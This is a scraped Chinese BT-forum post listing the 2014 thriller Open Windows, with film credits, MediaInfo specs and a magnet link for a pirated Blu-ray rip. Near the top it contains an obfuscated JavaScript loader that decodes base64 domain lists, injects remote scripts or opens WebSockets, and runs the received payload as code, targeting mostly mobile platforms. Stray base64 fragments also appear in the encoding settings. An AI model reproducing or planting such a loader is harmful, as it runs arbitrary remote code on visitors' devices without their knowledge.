弹窗惊魂[双语字幕]Open.Windows.2014.1080p.BluRay.x264.DTS-迅雷下载 12.82GB

版主小s 12天前 182

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 弹窗惊魂 / 开启的窗口(台) / 云端仇人(台)
◎片  名 Open Windows
◎年  代 2014
◎产  地 法国 / 西班牙 / 美国
◎类  别 动作 / 惊悚 / 犯罪
◎语  言 英语 / 西班牙语
◎上映日期 2014-07-04(西班牙)
◎IMDb链接 https://www.imdb.com/title/tt2409818/
◎豆瓣评分 6.2/10 (2469人评价)
◎豆瓣链接 https://movie.douban.com/subject/19974285/
◎片  长 100分钟
◎导  演 那奇欧·维加隆多 Nacho Vigalondo (id:1306843)
◎编  剧 那奇欧·维加隆多 Nacho Vigalondo (id:1306843)
◎演  员 伊利亚·伍德 Elijah Wood (id:1054395)
       萨莎·格蕾 Sasha Grey (id:1031895)
       尼尔·马斯克尔 Neil Maskell (id:1339918)
       米歇尔·珍娜 Michelle Jenner (id:1050174)
       胡里安·毕亚格兰 Julián Villagrán (id:1193599)
       卡洛斯·阿雷塞斯 Carlos Areces (id:1330859)
       劳尔·西马斯 Raúl Cimas (id:1344729)
       Miguel Noguera Miguel Noguera (id:1344730)
       那奇欧·维加隆多 Nacho Vigalondo (id:1306843)
       Richard Diment Richard Diment (id:1344731)
       尤金尼奥·米拉 Eugenio Mira (id:1028857)
       崔凡特·罗兹 Trevante Rhodes (id:1340760)
        Mike McCutchen (id:1270605)
       丹尼尔·佩雷兹·普拉达 Daniel Pérez Prada (id:1146879)
       Rachel Arieff Rachel Arieff (id:1190347)
       海梅·奥利亚斯 Jaime Olías (id:1322925)
       伊凡·冈萨雷斯 Iván González (id:1101638)
       丹尼尔·诺阿 Daniel Noah (id:1328692)

◎标  签 悬疑 / 惊悚 / 犯罪 / 西班牙 / 美国 / 黑客 / 法国 / 动作

◎简  介
  萨拉·格雷在片中饰演一名女演员,遭到了坏人的绑架(尼尔·马斯克尔),而伊利亚·伍德饰演的角色试图通过她在网络上遗留下来的痕迹,来找到她并救出她。影片的特别之处在于其全部镜头都是通过电脑摄像头、手机摄像头、监视器等现实生活中处处可见的视频工具拍摄而成。

◎获奖情况 (共1项)
  第29届西班牙戈雅奖 (2015)
  最佳特效(提名)
   └──David Heras (id:1334066)
   └──劳尔·罗曼尼洛斯 (id:1295967)

  1. General
  2. Unique ID                                : 38265130472270691203196646773425972083 (0x1CC99897677265405495CC5A88742373)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 12.8 GiB
  7. Duration                                 : 1 h 40 min
  8. Overall bit rate                         : 18.3 Mb/s
  9. Encoded date                             : UTC 2021-07-20 14:33:04
  10. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 1 h 40 min
  22. Bit rate                                 : 16.7 Mb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 1 080 pixels
  25. Display aspect ratio                     : 16:9
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 24.000 FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.335
  33. Stream size                              : 11.7 GiB (91%)
  34. Writing library                          : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0 / zones=0,960,crf=25/138872,144718,crf=25
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. ID in the original source medium         : 4353 (0x1101)
  42. Format                                   : DTS
  43. Format/Info                              : Digital Theater Systems
  44. Codec ID                                 : A_DTS
  45. Duration                                 : 1 h 40 min
  46. Bit rate mode                            : Constant
  47. Bit rate                                 : 1 509 kb/s
  48. Channel(s)                               : 6 channels
  49. Channel layout                           : C L R Ls Rs LFE
  50. Sampling rate                            : 48.0 kHz
  51. Frame rate                               : 93.750 FPS (512 SPF)
  52. Bit depth                                : 16 bits
  53. Compression mode                         : Lossy
  54. Stream size                              : 1.06 GiB (8%)
  55. Language                                 : English
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. ID in the original source medium         : 4609 (0x1201)
  62. Format                                   : PGS
  63. Muxing mode                              : zlib
  64. Codec ID                                 : S_HDMV/PGS
  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  66. Duration                                 : 1 h 35 min
  67. Bit rate                                 : 51.4 kb/s
  68. Count of elements                        : 2404
  69. Stream size                              : 35.0 MiB (0%)
  70. Title                                    : chs&eng
  71. Language                                 : Chinese
  72. Default                                  : Yes
  73. Forced                                   : No
  74. Original source medium                   : Blu-ray
  75. Text #2
  76. ID                                       : 4
  77. ID in the original source medium         : 4610 (0x1202)
  78. Format                                   : PGS
  79. Muxing mode                              : zlib
  80. Codec ID                                 : S_HDMV/PGS
  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  82. Duration                                 : 1 h 35 min
  83. Bit rate                                 : 51.7 kb/s
  84. Count of elements                        : 2404
  85. Stream size                              : 35.2 MiB (0%)
  86. Title                                    : cht&eng
  87. Language                                 : Chinese
  88. Default                                  : No
  89. Forced                                   : No
  90. Original source medium                   : Blu-ray
  91. Text #3
  92. ID                                       : 5
  93. ID in the original source medium         : 4611 (0x1203)
  94. Format                                   : PGS
  95. Muxing mode                              : zlib
  96. Codec ID                                 : S_HDMV/PGS
  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  98. Duration                                 : 1 h 35 min
  99. Bit rate                                 : 29.0 kb/s
  100. Count of elements                        : 2403
  101. Stream size                              : 19.7 MiB (0%)
  102. Title                                    : chs
  103. Language                                 : Chinese
  104. Default                                  : No
  105. Forced                                   : No
  106. Original source medium                   : Blu-ray
  107. Text #4
  108. ID                                       : 6
  109. ID in the original source medium         : 4612 (0x1204)
  110. Format                                   : PGS
  111. Muxing mode                              : zlib
  112. Codec ID                                 : S_HDMV/PGS
  113. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  114. Duration                                 : 1 h 35 min
  115. Bit rate                                 : 29.4 kb/s
  116. Count of elements                        : 2403
  117. Stream size                              : 20.0 MiB (0%)
  118. Title                                    : cht
  119. Language                                 : Chinese
  120. Default                                  : No
  121. Forced                                   : No
  122. Original source medium                   : Blu-ray
  123. Text #5
  124. ID                                       : 7
  125. ID in the original source medium         : 4613 (0x1205)
  126. Format                                   : PGS
  127. Muxing mode                              : zlib
  128. Codec ID                                 : S_HDMV/PGS
  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  130. Duration                                 : 1 h 35 min
  131. Bit rate                                 : 22.6 kb/s
  132. Count of elements                        : 2364
  133. Stream size                              : 15.4 MiB (0%)
  134. Title                                    : eng
  135. Language                                 : English
  136. Default                                  : No
  137. Forced                                   : No
  138. Original source medium                   : Blu-ray
  139. Menu
  140. 00:00:00.000                             : Chapter 01
  141. 00:06:01.291                             : Chapter 02
  142. 00:11:15.250                             : Chapter 03
  143. 00:17:13.208                             : Chapter 04
  144. 00:25:13.708                             : Chapter 05
  145. 00:31:01.958                             : Chapter 06
  146. 00:36:13.833                             : Chapter 07
  147. 00:43:30.250                             : Chapter 08
  148. 00:50:57.166                             : Chapter 09
  149. 00:56:29.625                             : Chapter 10
  150. 01:02:32.416                             : Chapter 11
  151. 01:08:53.958                             : Chapter 12
  152. 01:14:02.708                             : Chapter 13
  153. 01:18:40.750                             : Chapter 14
  154. 01:27:28.625                             : Chapter 15
  155. 01:32:22.208                             : Chapter 16




TAGS 动作 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:9F4D1AB44424161A152B5E830B1177FFE2EC24D1
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回